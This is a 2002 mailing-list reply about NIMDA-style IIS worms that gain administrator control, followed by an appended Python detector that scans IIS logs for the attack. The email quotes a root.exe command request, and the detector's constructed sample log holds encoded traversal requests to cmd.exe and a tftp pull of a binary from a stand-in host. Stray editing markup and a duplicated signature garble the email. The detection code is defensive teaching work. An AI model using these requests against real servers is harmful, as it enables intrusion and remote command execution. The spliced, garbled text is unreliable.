From: Jens Benecke (mail-020506jensbenecke.de)
Date: Mon May 06 2002 - 15:20:52 CDT
Your mail client seems to quote improperly (see below). Perhaps you'll
want to fix this.
On Sat, May 04, 2002 at 10:11:56AM -0700, H C wrote:
> > If you look at defaced.alldas.org, sorted by OS, you will see that
> > about 60% of all cracked web sites are IIS / Microsoft machines,
> > while (according to Netcraft) IIS only makes up about 25% of the
> > whole web server market.
> Thanks for the response, but that really doesn't answer my question.
> While Alldas.org does show defaced web pages, it doesn't show how the
> pages were defaced. Therefore, there's no way of knowing if it was a
> Unicode exploit, or if someone did something as I mentioned in my
> original post.
Well... in all the cases that I have seen so far, Windows boxes are
running IIS with administrator rights (can you run it as a normal user
at all? Can it drop privileges after binding to port 80, Like Apache?),
and once you control that process, you are effectively root.
> > Does one of the numerous IIS viruses (NIMDA, CodeRed, Codeblue, etc)
> > count?
> No. My original question was about NT/2K systems that had been broken
> into and taken over in a manner similar to how Linux boxes are
> 'rooted'. Since none of the worms you mention do this (break in,
> install backdoors/rootkit(s), modify system binaries, etc) the answer
> would be no.
But they do. NIMDA and several others exploit a Unicode bug in IIS, use
the bug to download several binaries from another IP (e.g. a custom TFTP
server), create a guest account with administrator privileges, copy
cmd.exe into the web root, and put all downloaded files there as well so
the next attacked box can be served as well.
When you do "GET http://cracked-box/scripts/root.exe?/c+dir+C:\\", you
are effectively root: you can shut down the machine remotely with a
rundll32.exe call, and you can do everything you can do with the shell
(which, admittedly, isn't as much as you can do on e.g. Linux or
BSD, but it's enough to do damage).
</grreplace>
<gr_replace lines="39" cat="clarify" orig="-- mfg, Jens">
--
Regards, Jens Benecke /// www.hitchhikers.de, www.linuxfaq.de, www.linux.ms
This mail is an attachment? Read http://www.jensbenecke.de/misc/outlook.html
Some of the variants also destroy logs and replace IIS binaries. I
think this qualifies as 'being rooted'.
-- mfg, Jens Benecke /// www.hitchhikers.de, www.linuxfaq.de, www.linux.ms This mail is an attachment? Read http://www.jensbenecke.de/misc/outlook.html
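The attack chain described in the message above (an overlong-UTF-8 or double-encoded traversal into cmd.exe, the cmd.exe copy left in the web root as root.exe, and a tftp pull of further binaries) leaves recognisable traces in IIS request logs, and spotting it is a matter of decoding the request path the way IIS eventually did and only then checking for "..". The detector below is an added example written for this page, not code from the thread or from any IIS component; the W3C-style log lines, the client addresses and the fixed field order (date, time, c-ip, method, uri-stem, uri-query, status) are constructed for illustration, and it folds only the two- and three-byte overlong UTF-8 forms of ASCII, passing every other byte through unchanged.

```python
import re
from urllib.parse import unquote_to_bytes

# Binaries whose appearance as the requested resource signals command execution
# through the web server: cmd.exe reached via traversal, or root.exe, the copy of
# cmd.exe that the worms leave in /scripts and /msadc.
SUSPECT_BINARIES = {"cmd.exe", "root.exe"}

# '..' as a whole path component, matched against the *decoded* path.
TRAVERSAL = re.compile(r"(?:^|/)\.\.(?:/|$)")


def fold_overlong_utf8(raw: bytes) -> str:
    """Fold overlong UTF-8 encodings of ASCII (C0 AF -> '/', C1 9C -> '\\',
    E0 80 AF -> '/') into the character they stand for. Every other byte is
    passed through as Latin-1, so genuine multibyte UTF-8 is left alone."""
    out = []
    i, n = 0, len(raw)
    while i < n:
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < n and 0x80 <= raw[i + 1] <= 0xBF:
            # two-byte form whose value fits in 7 bits: overlong by definition
            out.append(chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        elif (b == 0xE0 and i + 2 < n and 0x80 <= raw[i + 1] <= 0x9F
              and 0x80 <= raw[i + 2] <= 0xBF):
            # three-byte form with a value below U+0800: also overlong
            out.append(chr(((raw[i + 1] & 0x3F) << 6) | (raw[i + 2] & 0x3F)))
            i += 3
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def decode_iis_path(stem: str) -> str:
    """Canonicalise a request path the way the attacker relies on the server
    doing it: percent-decode twice (so %255c -> %5c -> '\\'), fold overlong
    UTF-8, then treat '\\' as '/' and lower-case, as the NT filesystem does."""
    raw = unquote_to_bytes(unquote_to_bytes(stem))
    return fold_overlong_utf8(raw).replace("\\", "/").lower()


def scan(log_text: str):
    """Return (line number, c-ip, decoded stem, findings) for each flagged line."""
    hits = []
    for lineno, line in enumerate(log_text.strip().splitlines(), 1):
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        _date, _time, c_ip, _method, stem, query, _status = parts[:7]
        decoded = decode_iis_path(stem)
        findings = []
        if TRAVERSAL.search(decoded):
            findings.append("traversal")
        if decoded.rsplit("/", 1)[-1] in SUSPECT_BINARIES and query.lower().startswith("/c"):
            findings.append("cmd-exec")
        if "tftp" in query.lower():
            findings.append("tftp-download")
        if findings:
            hits.append((lineno, c_ip, decoded, tuple(findings)))
    return hits


# Constructed sample log (not real traffic): the first four lines mimic the
# traversal, root.exe and tftp requests discussed above; the last two are benign.
SAMPLE_LOG = r"""
2002-05-06 15:20:52 192.0.2.10 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\ 200
2002-05-06 15:20:53 192.0.2.10 GET /scripts/root.exe /c+dir+c:\ 200
2002-05-06 15:20:54 192.0.2.10 GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe /c+tftp+-i+192.0.2.10+GET+Admin.dll+c:\Admin.dll 200
2002-05-06 15:20:55 192.0.2.10 GET /msadc/..%e0%80%af../winnt/system32/cmd.exe /c+dir 200
2002-05-06 15:21:00 198.51.100.7 GET /default.htm - 200
2002-05-06 15:21:05 198.51.100.7 GET /images/logo.gif - 304
"""

if __name__ == "__main__":
    for lineno, c_ip, decoded, findings in scan(SAMPLE_LOG):
        print(f"line {lineno} {c_ip} {decoded} -> {', '.join(findings)}")
```

The order of operations is the whole point: a filter that looks for ".." in the raw, still-encoded stem sees "..%c0%af.." and "..%255c.." as harmless, which is exactly the mistake the traversal requests exploit. Decoding first and checking afterwards is also why a request for root.exe is flagged on the binary name alone: once cmd.exe has been copied into the web root there is no traversal left to detect, only the backdoor being used.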